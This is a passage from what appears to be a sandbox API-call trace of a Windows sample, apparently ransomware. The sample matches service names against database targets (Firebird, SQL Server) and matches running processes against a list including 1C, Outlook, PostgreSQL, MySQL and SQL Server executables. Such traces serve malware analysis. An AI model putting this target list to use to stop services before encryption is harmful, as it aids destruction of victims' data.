	[0045.096] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0045.096] lstrlenW (lpString="CscService") returned 10
	[0045.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0045.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0045.096] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0045.096] lstrlenW (lpString="DcomLaunch") returned 10
	[0045.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0045.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0045.096] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0045.096] lstrlenW (lpString="Dhcp") returned 4
	[0045.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0045.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0045.096] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0045.096] lstrlenW (lpString="Dnscache") returned 8
	[0045.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0045.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0045.096] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0045.097] lstrlenW (lpString="DPS") returned 3
	[0045.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0045.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0045.097] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0045.097] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0045.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0045.097] lstrlenW (lpString="eventlog") returned 8
	[0045.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0045.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0045.097] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0045.097] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0045.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0045.097] lstrlenW (lpString="EventSystem") returned 11
	[0045.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0045.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0045.097] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0045.097] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0045.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0045.097] lstrlenW (lpString="gpsvc") returned 5
	[0045.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0045.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0045.097] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0045.097] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0045.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0045.097] lstrlenW (lpString="iphlpsvc") returned 8
	[0045.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0045.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0045.097] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0045.097] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0045.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0045.097] lstrlenW (lpString="LanmanServer") returned 12
	[0045.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0045.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0045.097] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0045.097] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0045.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0045.098] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0045.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0045.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0045.098] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0045.098] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0045.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0045.098] lstrlenW (lpString="lmhosts") returned 7
	[0045.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0045.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0045.098] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0045.098] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0045.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0045.098] lstrlenW (lpString="MMCSS") returned 5
	[0045.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0045.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0045.098] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0045.098] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0045.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0045.098] lstrlenW (lpString="MpsSvc") returned 6
	[0045.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0045.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0045.098] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0045.098] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0045.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0045.098] lstrlenW (lpString="Netman") returned 6
	[0045.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0045.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0045.098] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0045.098] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0045.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0045.098] lstrlenW (lpString="netprofm") returned 8
	[0045.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0045.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0045.098] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0045.098] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0045.099] lstrlenW (lpString="NlaSvc") returned 6
	[0045.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0045.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0045.099] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0045.099] lstrlenW (lpString="nsi") returned 3
	[0045.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0045.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0045.099] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0045.099] lstrlenW (lpString="PcaSvc") returned 6
	[0045.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0045.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0045.099] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0045.099] lstrlenW (lpString="PlugPlay") returned 8
	[0045.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0045.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0045.099] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0045.099] lstrlenW (lpString="Power") returned 5
	[0045.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0045.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0045.099] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0045.099] lstrlenW (lpString="ProfSvc") returned 7
	[0045.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0045.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0045.099] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0045.100] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0045.100] lstrlenW (lpString="RpcEptMapper") returned 12
	[0045.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0045.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0045.100] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0045.100] lstrlenW (lpString="RpcSs") returned 5
	[0045.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0045.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0045.100] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0045.100] lstrlenW (lpString="SamSs") returned 5
	[0045.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0045.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0045.100] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0045.100] lstrlenW (lpString="Schedule") returned 8
	[0045.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0045.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0045.100] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0045.100] lstrlenW (lpString="SENS") returned 4
	[0045.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0045.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0045.100] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0045.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0045.100] lstrlenW (lpString="ShellHWDetection") returned 16
	[0045.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0045.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0045.101] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0045.101] lstrlenW (lpString="Spooler") returned 7
	[0045.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0045.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0045.101] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0045.101] lstrlenW (lpString="swprv") returned 5
	[0045.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0045.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0045.101] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0045.101] lstrlenW (lpString="SysMain") returned 7
	[0045.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0045.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0045.101] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0045.101] lstrlenW (lpString="Themes") returned 6
	[0045.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0045.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0045.101] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0045.101] lstrlenW (lpString="TrkWks") returned 6
	[0045.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0045.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0045.101] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0045.101] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0045.102] lstrlenW (lpString="UxSms") returned 5
	[0045.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0045.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0045.102] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0045.102] lstrlenW (lpString="VSS") returned 3
	[0045.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0045.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0045.102] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0045.102] lstrlenW (lpString="WdiServiceHost") returned 14
	[0045.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0045.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0045.102] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0045.102] lstrlenW (lpString="WdiSystemHost") returned 13
	[0045.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0045.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0045.102] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0045.102] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0045.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0045.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0045.102] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0045.102] lstrlenW (lpString="Winmgmt") returned 7
	[0045.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0045.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0045.102] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0045.103] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0045.103] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0045.103] lstrlenW (lpString="WPDBusEnum") returned 10
	[0045.103] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0045.103] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0045.103] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0045.103] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0045.103] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0045.103] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0045.103] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21c
	[0045.107] Process32FirstW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0045.107] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0045.108] lstrlenW (lpString="System") returned 6
	[0045.108] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0045.108] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0045.108] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0045.108] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0045.108] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0045.108] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0045.108] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0045.108] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0045.108] lstrlenW (lpString="smss.exe") returned 8
	[0045.108] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0045.108] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0045.108] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0045.108] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0045.108] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0045.108] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0045.108] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0045.109] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0045.109] lstrlenW (lpString="csrss.exe") returned 9
	[0045.109] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0045.109] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0045.109] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0045.109] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0045.109] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0045.109] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0045.109] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0045.109] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0045.110] lstrlenW (lpString="wininit.exe") returned 11
	[0045.110] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0045.110] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0045.110] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0045.110] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0045.110] lstrlenW (lpString="csrss.exe") returned 9
	[0045.110] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0045.111] lstrlenW (lpString="winlogon.exe") returned 12
	[0045.111] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0045.111] lstrlenW (lpString="services.exe") returned 12
	[0045.111] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0045.112] lstrlenW (lpString="lsass.exe") returned 9
	[0045.112] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0045.112] lstrlenW (lpString="lsm.exe") returned 7
	[0045.112] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0045.113] lstrlenW (lpString="svchost.exe") returned 11
	[0045.113] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0045.113] lstrlenW (lpString="svchost.exe") returned 11
	[0045.113] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0045.113] lstrlenW (lpString="svchost.exe") returned 11
	[0045.113] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
